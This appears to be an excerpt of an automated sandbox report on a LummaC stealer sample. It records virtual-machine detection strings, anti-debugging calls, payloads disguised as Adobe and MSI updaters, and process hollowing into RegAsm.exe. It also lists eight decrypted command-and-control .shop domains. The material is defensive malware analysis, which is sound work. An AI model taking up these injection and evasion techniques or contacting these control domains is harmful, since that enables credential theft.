Source: Amcache.hve.29.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: RegAsm.exe, 00000019.00000002.3510229323.0000000000ED6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.2783862547.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8
Source: Amcache.hve.29.dr	Binary or memory string: VMware Virtual USB Mouse
Source: AdobeUpdaterV1.exe, 00000018.00000002.3505470905.0000000001338000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ?\#disk&ven_vmware&prouask#4&1656f219&0&0000f5-b6bf-11d0-94f2-00a08b
Source: Amcache.hve.29.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.29.dr	Binary or memory string: VMware, Inc.
Source: RegAsm.exe, 0000002C.00000002.3509342638.000000000157A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: 3Q7v9y6Zw0a51Z43zHih.exe, 00000008.00000002.3505645957.0000000001CC0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&.
Source: Amcache.hve.29.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.29.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.29.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: OJa1BOigU3.exe, 00000000.00000003.1714652584.0000000001500000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}@<4
Source: Amcache.hve.29.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.29.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: OJa1BOigU3.exe, 00000000.00000003.1714652584.0000000001500000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}B/=
Source: RegAsm.exe, 00000011.00000002.2647689981.0000000000C7A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`D
Source: Amcache.hve.29.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.29.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.29.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.29.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: 3Q7v9y6Zw0a51Z43zHih.exe, 00000008.00000002.3505645957.0000000001D1D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP'
Source: Amcache.hve.29.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: RegAsm.exe, 00000011.00000002.2647878541.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWNb
Source: RegAsm.exe, 0000002A.00000002.3509011004.000000000126F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWS
Source: Amcache.hve.29.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: AdobeUpdaterV1.exe, 00000018.00000002.3505470905.0000000001353000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWI
Source: MSIUpdaterV1.exe, 00000009.00000002.3506110613.0000000001694000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000019.00000002.3510229323.0000000000F11000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002C.00000002.3509342638.000000000159A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWL
Source: OJa1BOigU3.exe, 00000000.00000003.2161668740.0000000005DF4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}C&5
Source: AdobeUpdaterV1.exe, 00000018.00000002.3505470905.00000000012D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&<
Source: OJa1BOigU3.exe, 00000000.00000002.2346129634.0000000001534000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWC,5

Source: C:\Users\user\Desktop\OJa1BOigU3.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 17_2_0043B430 LdrInitializeThunk,

17_2_0043B430

Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe

Code function: 22_2_0039B915 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

22_2_0039B915

Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_003AF146 mov eax, dword ptr fs:[00000030h]	22_2_003AF146
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_00497A30 mov eax, dword ptr fs:[00000030h]	22_2_00497A30
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_00497A30 mov eax, dword ptr fs:[00000030h]	22_2_00497A30
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_003A5B6D mov ecx, dword ptr fs:[00000030h]	22_2_003A5B6D
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_00421E50 mov eax, dword ptr fs:[00000030h]	22_2_00421E50
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_00421E50 mov eax, dword ptr fs:[00000030h]	22_2_00421E50
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_00421E50 mov eax, dword ptr fs:[00000030h]	22_2_00421E50
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_00421E50 mov eax, dword ptr fs:[00000030h]	22_2_00421E50
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_0012F146 mov eax, dword ptr fs:[00000030h]	23_2_0012F146
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_00125B6D mov ecx, dword ptr fs:[00000030h]	23_2_00125B6D
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_00217A30 mov eax, dword ptr fs:[00000030h]	23_2_00217A30

Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_0039B5F0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	22_2_0039B5F0
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_0039B915 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	22_2_0039B915
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: 22_2_003A1E2D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	22_2_003A1E2D
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_0011B5F0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	23_2_0011B5F0
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_0011B915 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	23_2_0011B915
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Code function: 23_2_00121E2D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	23_2_00121E2D

Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe

Code function: 15_2_02F897F1 CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,

15_2_02F897F1

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

LummaC encrypted strings found

Source: U8cABsPhZFkKRrQ4rE0N.exe, 0000000F.00000002.2291557988.0000000003F85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: boredimperissvieos.shop
Source: U8cABsPhZFkKRrQ4rE0N.exe, 0000000F.00000002.2291557988.0000000003F85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: holicisticscrarws.shop
Source: U8cABsPhZFkKRrQ4rE0N.exe, 0000000F.00000002.2291557988.0000000003F85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: sweetsquarediaslw.shop
Source: U8cABsPhZFkKRrQ4rE0N.exe, 0000000F.00000002.2291557988.0000000003F85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: plaintediousidowsko.shop
Source: U8cABsPhZFkKRrQ4rE0N.exe, 0000000F.00000002.2291557988.0000000003F85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: miniaturefinerninewjs.shop
Source: U8cABsPhZFkKRrQ4rE0N.exe, 0000000F.00000002.2291557988.0000000003F85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: zippyfinickysofwps.shop
Source: U8cABsPhZFkKRrQ4rE0N.exe, 0000000F.00000002.2291557988.0000000003F85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: obsceneclassyjuwks.shop
Source: U8cABsPhZFkKRrQ4rE0N.exe, 0000000F.00000002.2291557988.0000000003F85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: acceptabledcooeprs.shop

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 440000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 443000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 456000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 99B008	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 55A000
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 582000
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 587000
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 592000
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 9CD008
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 55A000
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 582000
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 587000
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 592000
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 11C9008
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 55A000
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 582000
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 587000
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 592000
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: E68008
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 440000
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 443000
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 456000
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: A0F008
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 440000
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 443000
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 456000
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: D0B008
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 440000
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 443000
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 456000
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 65C008

Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Process created: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe "C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe"	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Process created: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe "C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe"	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Process created: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe "C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe	Process created: unknown unknown

Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe

Code function: 22_2_003F8175 cpuid

22_2_003F8175

Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: GetLocaleInfoW,	22_2_003B11E5
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	22_2_003B130E
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: GetLocaleInfoW,	22_2_003AA3A6
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: GetLocaleInfoW,	22_2_003B1414
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	22_2_003B14E3
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: EnumSystemLocalesW,	22_2_003B0E21
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: EnumSystemLocalesW,	22_2_003B0E6C
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Code function: EnumSystemLocalesW,	22_2_003A9EFC
